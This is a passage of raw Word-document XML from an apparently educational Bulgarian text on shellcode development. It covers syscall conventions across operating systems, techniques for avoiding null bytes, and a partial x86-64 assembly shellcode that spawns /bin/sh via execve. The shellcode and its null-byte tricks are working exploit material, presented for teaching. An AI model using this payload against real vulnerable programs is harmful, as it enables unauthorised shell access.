      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>. Анализ на изпълними програми</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:endnoteReference w:id="27"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> показва, че текущите версии на Windows използват </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> инструкция, но исторически (например XP) са използвани много разнообразни методи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_aa1pzkds8h1n" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="47" w:name="_Toc3540764"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidRPr="00112660">
        <w:t>MacOS и BSD варианти</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Вариантите на BSD, както и близкия macOS също използват System V конвенцията. Това обаче не ги прави съвместими. Те имат различни разширения на стандартните UNIX системни функции, много от които нямат еквиваленти (например </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>kqueue()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>). Също така, много от номерата на еднаквите системни функции се разминават. Разликите са достатъчно малко, за да има съвместимост на ниво сорс код, но достатъчни, за да няма при изпълними файлове.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C2774A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_nsu8zj5mmg5y" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="49" w:name="_Toc3540765"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Разлики между архитектурите</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Архитектури като ARM са изцяло различни от фамилията x86. ARM е RISC (Reduced Instruction Set Computer), а x86 - CISC (Complex Instruction Set Computer), имат различни регистри, мнемоники, синтаксис на асемблер и още много други. Въпреки това идеите за шелкод са същите.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_6as6pikn3c73" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="51" w:name="_Toc3540766"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Методи за избягване на нулеви байтове</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_8bifs3rlj0sb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="53" w:name="_Ref2190388"/>
      <w:bookmarkStart w:id="54" w:name="_Toc3540767"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Xor %</w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, %reg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="00532C4C" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Инструкция от вида </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>movq $0, %rax</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t xml:space="preserve"> съответства на байтовете, “\x48\xc7\xc0\x00\x00\x00\x00”, 4 от които нулеви. Може да се използва свойството, че число xor със себе си прави</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0, което би било инструкцията </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>xorq %rax, %rax</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t>. Тя съответства на “\x48\x31\xc0”, което, освен че не съдържа нулеви байтове, заема по-малко памет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_n7pq9p1qgoph" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="56" w:name="_Toc3540768"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> label(%rip), %rax</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">За да може </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>шелкодът да бъде независим от адреса, на който е зареден, може да се използва режим за адресиране относно програмния брояч (instruction pointer relative addressing). Проблем е поредица от вида</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="000B2140" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="000B2140">
        <w:t>movb data(%rip), %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="000B2140" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="000B2140">
        <w:t>data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="000B2140" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="000B2140">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2140">
        <w:tab/>
        <w:t>.byte 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Тя съответства на “\x8a\x05\x00\x00\x00\x00\xff”, което отново съдържа 4 нулеви байта, защото отместването на адреса е положително. Ако преместим байта “data” преди инструкцията обаче, отместването е вече отрицателно число, кодирано в “two’s complement”, което съответства на “\xff\x8a\x05\xf9\xff\xff\xff”. Недостатъкът е, че резултатният шелкод ще има неизпълнима информация в тялото си. Това също може да се заобиколи, като се подреди всичката постоянна информация в началото му и адресът на презаписания rip стане първата изпълнима инструкция или да се сложи </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> инструкция преди информацията. Сега единственият недостатък е, че деасемблирането понякога е неуспешно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_mtjqrs7gl7j2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="58" w:name="_Toc3540769"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Предположения</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> за изпълнението</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Добри практики за разработка биха означавали проверки за грешки след всяка системна функция, правилна работа с типове и нулиране на регистри всеки път. При шелкод обаче, могат да се направят някои предположения, които биха намалили размера му, без да се жертва правилнотото изпълнение. Например:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Пропускане на проверки за грешки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Например </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>socket()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> би могъл да върне грешка EMFILE - достигнат лимит на отворени файлове. Проверката след тази функция би била 2-3 инструкции, които могат да бъдат пропуснати, защото шансът тази грешки да се случи е изключително малък</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Нулиране на по-малки регистри</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">В комбинация с </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>предишното, може да не се нулира целият rax регистър след системна функция, а само очаквано променената част или да не се нулира, ако очакваме резултат 0. Например “</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>xorq %rax, %rax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>” е 3 байта - “48 31 c0”, а “</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">” е 2 - “31 c0”. Това е валидно и за други инструкции - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>lea</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> и други. Освен това, 32 битовите инструкции имат предимството, че нулират старшите 32 байта на целевия си регистър. Така може да се използва по-кратка инструкция за същия резултат, както е при xor.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_gzss1wah0ptz" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="60" w:name="_Toc3540770"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Разработване на </w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>примерен</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> шелкод</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_qf5lv6972az5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="62" w:name="_Toc3540771"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Класически</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Класическата форма на шелкод е стартирането на команден интерпретатор. Тя е аналогична на системна функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>execve()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> с параметър пътят към шела. В случай на грешка се добавя </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>exit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> накрая, за да приключи програмата нормално, а не със “segmentation fault”, заради изпълнение на памет, която не е разпределена от ядрото. Тази функционалност изглежда така:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="001E0963" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3657600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1786890" cy="16954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890" cy="1695450"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00875CB1" w:rsidRPr="00112660" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="codeblock"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00112660">
                              <w:t>syscall</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>| execve() |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      v</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>|  exit()  |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875C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in;margin-top:.75pt;width:140.7pt;height:13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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00875CB1" w:rsidRPr="00112660" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="codeblock"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00112660">
                        <w:t>syscall</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>| execve() |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      v</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>|  exit()  |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t>.global _start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>.text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>_start:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>jmp next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.ascii "/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>eol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>next:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># stack is executable, i can do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb %al, eol(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq sh(%rip), %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_execve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $59, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
